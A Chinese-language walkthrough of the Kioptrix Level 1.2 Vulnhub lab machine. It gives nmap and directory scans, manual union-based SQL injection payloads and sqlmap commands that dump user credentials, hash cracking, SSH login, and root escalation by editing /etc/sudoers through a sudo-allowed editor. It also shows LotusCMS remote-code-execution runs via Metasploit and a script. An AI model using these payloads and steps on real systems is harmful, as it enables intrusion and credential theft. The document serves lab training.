0×03 Vulnhub 靶机渗透总结之 KIOPTRIX: LEVEL 1.2 (#3) SQL注入+sudo提权

0×03 Vulnhub 靶机渗透总结之 KIOPTRIX: LEVEL 1.2 (#3)

🔥系列专栏:Vulnhub靶机渗透系列
🔥欢迎大佬:👍点赞⭐️收藏➕关注
🔥首发时间: 2023年8月22日
🌴如有错误 还望告知 万分感谢

🌴 基本信息:

KIOPTRIX:LEVEL1.2(#3),vulnhub平台下简单难度靶机。本文并非复现writeup关键在于打靶思路,主要是从web层面入手。本文采用了比较常规的一种方法:通过SQL注入获取用户凭据,ssh登陆靶机进行sudo提权,文中手动注入和SQLmap自动化均有呈现,后续也尝试了框架漏洞的利用的尝试。这台靶机存在漏洞较多,需要根据自身经验做出筛选、权衡与比对,是对综合知识和技能的考察,攻击链很标准,获取shell的方法可以逐一尝,是一台锻炼攻击思路的好靶机。

kioptrix靶机图片无法加载,修改hosts文件 192.168.80.178 kioptrix3.com。或 burp 中自定义域名解析

名称 说明
靶机下载链接 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
作者 Kioptrix
发布日期 Apr 2011
难度 easy
攻击机(kali) ip:192.168.80.148
靶机(CentOS) ip:192.168.80.178

🌴信息收集

主机发现、端口扫描、服务枚举、脚本漏扫(nmap)

nmap 192.168.80.0/24 -sn --min-rate 1000
nmap 192.168.80.178 -sT -p- --min-rate 1000 -oA nmap_result/port_scan
nmap 192.168.80.178 -sU --top-ports -oA nmap_resule/portudp_scan
nmap 192.168.80.178 -p $port -sT -sV -O -sC -oA nmap_result/server_info
nmap 192.168.80.178 -p $port --script=vuln -oA nmap_result/vuln_info

port=$(grep open nmap_result/port_scan.nmap|grep open|awk -F '/' '{print $1}'|paste -sd ',') 

开放端口:tcp 22,80
可能存在sql注入和CSRF

22/tcp open ssh OpenSSH 4.7p1
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6

目录扫描(dirsearch、gobuster)

dirsearch -u "http://kioptrix3.com/" --ip=192.168.80.178 --full-url -o /home/wsec/kioptrix3/dirsearch_info

gobuster dir -u http://192.168.80.178 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -o gobuster_info

/modules/backup 存在备份文件
/phpmyadmin 进入phpmyadmin管理界面,出现phpmyadmin版本信息,后续可尝试相关利用

指纹识别(whatweb)

whatweb进行网站指纹识别网站探测是否由cms搭建

whatweb "http://192.168.80.141/"

探测到网站首页使用LotusCMS,但版本未知。后续可在漏洞库查有无对应框架漏洞可以利用。

目录爬取 (burp Scaner)

dirsearch目录扫描结果放到 burp NewScaner,配置爬虫深度为0

cat dirsearch_info | grep -v 403 |grep -v 401| awk -F ' ' '{print $3}'

//所有站点都扫描太慢了,提取了2个关键目标,目标少也可以直接在burp中repeater中请求
http://kioptrix3.com:80/gallery
http://kioptrix3.com:80/index.php

/gallery/gadmin/index.php (LotusCms后台登录页)

🌴 web渗透

PORT 80 http (功能点测试)

<1>评论功能(POST。可能存在XSS)

http://kioptrix3.com/index.php?system=Blog&post=1281005380

<2>登录功能(POST。尝试简单使用注释绕过但失败,还应测试是否存在弱口令)

http://kioptrix3.com/index.php?system=Admin

<3>图片排序功能(GET。可能存在SQL注入,优先考虑)

http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos

SQLi GET(salmap)🔑

<1>整理可能存在SQL注入的测试点。
<2>sqlmap获取注入点。在测试第一个url就获取到了注入点。
<3>针对存在注入点的url,依次查询查询(库、表、表内容)

//SQL_GET.txt
http://192.168.80.178/gallery/gallery.php?id=1*&sort=views*
http://192.168.80.178/gallery/photos.php?id=3&sort=viwes*
http://192.168.80.178/index.php?system=Blog&archive=2010-8*
http://192.168.80.178/index.php?system=Blog&category=0*
http://192.168.80.178/index.php?system=Blog&post=1281005382*
sqlmap -m SQL_GET.txt -v3  --technique=BEU --batch

sqlmap -u http://192.168.80.178/gallery/gallery.php?id=1* --dbs --batch
sqlmap -u http://192.168.80.178/gallery/gallery.php\?id\=1* -D gallery --tables --batch
sqlmap -u http://192.168.80.178/gallery/gallery.php?id=1* -D gallery -T gallarific_users --dump-all 

john sql_hash --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt

从gallarific_users表 获取到以下用户凭证信息:admin/n0t7t1k4
从dev_accounts表 获取到以下用户凭证信息(密码也可以cmd5网上解密):dreg/Mast3r,loneferret/starwars

🌴 shell as user(ssh)

ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
ssh -oHostKeyAlgorithms=+ssh-dss [email protected]

用获取到的两个凭证尝试进行ssh登录,结果成功获取普通用户权限shell。

🌴 shell as root(suid)

ssh登录loneferret用户,查找SUID可执行文件,发现ht编辑器sudo -l 发现该编辑器被分配root权限。如果编辑/etc/sudoers,权限添加/bin/bash,可以直接拿root的shell了。

ssh -oHostKeyAlgorithms=+ssh-dss [email protected]

find / -perm -u=s -type f 2>/dev/null
sudo -l
sudo /usr/local/bin/ht
//报错Error opening terminal: xterm-256color.则 export TERM=xterm
//ht编辑器修改/etc/sudoers

sudo /bin/bash

拿到root权限

🌴 其他尝试:

1 SQLi(手工注入)

SQL注入测试点:http://192.168.80.141/gallery/gallery.php?id=1&sort=filename

<1> 单引号,双引号。

?id=1' (报错:syntax to use near '' order by parentid,sort,name' at line 1)
?id=1" (报错:syntax to use near '" order by parentid,sort,name' at line 1)
得出结论:参数id后面的代码是order by parentid,sort,name。

<2>尝试构建使得不报错。

#注释掉order by parentid,sort,name。
?id=1' #(报错)
?id=1 #(不报错)
得出结论:大概率是个整型注入

<3>判断能否恶意修改。

?id=1' and 1=1#
?id=1 and 1=1#
得出结论:sql语句能被恶意修改带入数据库执行

<4> 枚举,判断数据库查了几列数据用于后面union拿数据。

?id=666 union select 11,22,33,44,55,66 #
?id=666 union select 11,database(),user(),44,55,66 #

(回显结果:database()为gallery,user()为root@localhost)

<5>查库

http://kioptrix3.com/gallery/gallery.php?id=666 union select 11,22,group_concat(schema_name),44,55,66 from information_schema.schemata#

(回显结果:information_schema,gallery,mysql)

<6>查表

?id=666 union select 11,22,group_concat(TABLE_NAME),44,55,66  from information_schema.TABLES where TABLE_SCHEMA=database()#

(回显结果:dev_accounts,gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallarific_stats,gallarific_users)

<7>查gallarific_users表的字段

?id=666 union select 11,22,group_concat(column_name),44,55,66 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='gallarific_users' #

(回显结果:userid,username,password,usertype,firstname,lastname,email,datejoined,website,issuperuser,photo,joincode)

<8>查内容

?id=666 union select 11,username,password,44,55,66 from  gallery.gallarific_users#
?id=666 union select 11,22,group_concat(concat_ws(':',username,password)) ,44,55,66 from  gallery.gallarific_users#
?id=666 union select 11,22,group_concat(concat_ws(':',username,password)) ,44,55,66 from  gallery.dev_accounts#

回显结果 admin:n0t7t1k4,结果只有一个应该就是网站登录后台的账号密码

从gallarific_users表 获取到以下用户凭证信息:admin/n0t7t1k4
从dev_accounts表 获取到以下用户凭证信息(密码hash解密):dreg/Mast3r,loneferret/starwars

2 LotusCMS RCE(MSF)🔑

LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit):eval()函数RCE远程命令执行,需在msf中使用。要重新设置默认 uri 和 payload

msfconsole -q -x 'use exploit/multi/http/lcms_php_exec;set uri /index.php?page=index;set rhost 192.168.80.178;set payload php/bind_perl;run'

成功拿到www-data权限。可以尝试收集系统信息内核提权。

3 LotusCMS RCE 🔑

此外,也可以不使用MSF框架下的利用,github上找到lotusRCE.sh

./lotusRCE.sh http://192.168.80.178 

成功拿到www-data权限

可查看数据库配置文件(记录了用户名和密码),可以从这点切入到数据库,搞到两个密码的hash,john破解拿用户凭据

4 敏感信息-数据库配置文件

5 phpmyaqmin

http://192.168.80.141/phpmyadmin,得知版本为 phpMyAdmin 2.11.3deb1ubuntu1.3,没找到可利用的非XSS的

6 CMS gallarific (sqli)🔑

后来发现图片管理页面使用的另一套cms,存在sqli。
EXP要稍作修改,网站中数据库查的是6列数据,具体过程可参考文中的手工注入测试。

whatweb http://192.168.80.177/gallery/

//payload
http://kioptrix3.com/gallery/gallery.php?id=1 and 1=2 union select 1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6 from gallarific_users--

7 网站后台(文件上传)

http://192.168.80.141/gallery/gadmin/index.php

存在文件上传功能,上传后的图片可到前端页面查看。
尝试上传图片马,文件名和后缀名会被重命名,很难被利用(上传正常图片也无法正常显示)。

🌴 思路总结

只开放2个tcp端口,大概率是web渗透,考量应以SQLi、RCE等高危漏洞为首要突破点。

  1. 80端口(http):

    • 通过对站点进行目录扫描和爬取,获取到了网站备份文件以及后台登录页。而后对功能点进行测试:评论/登录/图片排序功能。对应的测试点:XSS、SQLi、网站后台、用户凭证。
    • 发现存在SQLi,使用sqlmap成功爆出两个用户凭据。ssh登录成功,获得初步立足点
    • 利用框架LotusCMS RCE漏洞成功获得反弹shell,再次获得立足点,可以看到网站数据库配置文件。
    • 后续也发现图片管理使用另一套CMS(Gallarific),存在sqli,尝试利用成功拿到两个ssh登录凭据。
  2. 提权阶段。SSH登录后发现loneferret用户具有sudo /usr/local/bin/ht的权限

    • 使用ht编辑器编辑/etc/sudoers
    • 给该用户的添加/bin/bash权限,让该用户能sudo执行/bin/bash
    • 成功拿到root的shell
    • 或追加 loneferret ALL=(ALL)NOPASSWD:ALL,也可以通过直接修改/etc/passwd中root的密码等方法
  3. 最后,靶机不难但也要做出思考:

  • 反思到底哪里才是靶机正确的思路,是从web功能点测试方向切入,还是从框架漏洞利用方向深入,在若干信息中选择性地尝试突围,这才是渗透测试人员的本事。
  • 需要随时盘点获得的信息,并对其进行判断,重要的是思路的拓展和细节的把控,即使走不通的也有其中的尝试和思考。
  • 信息搜集如果能更加完整,会省很多兜圈子的操作。

🌴 技巧

  1. burp 自带 js 分析功能,访问各个页面,可以整理出目标站点信息。

  2. 在进行提权时应该先广度优先,通过各种方式切入进系统,不同的账户可能拥有不同的敏感信息。

  3. 在 searchspoit 未发现特别好的漏洞利用脚本时,可以去github再进行搜索

  4. 拿到了初始shell,尝试提权时。可以先用python映射一个端口增加交互性:python -c "import pty;pty.spawn('/bin/bash')"

参考wp:Hack the Kioptrix Level-1.2 (Boot2Root Challenge)

本文部分图文来源于网络,仅作学术分享,实验环境是本地搭建的靶机,目的在于维护网络安全,不做任何导向。如果非法使用,一切法律后果自行承担。

热门相关:总裁别再玩了   拒嫁豪门,前妻太抢手   豪门情变,渣总裁滚远点!   未来兽世:买来的媳妇,不生崽   我想持续做爱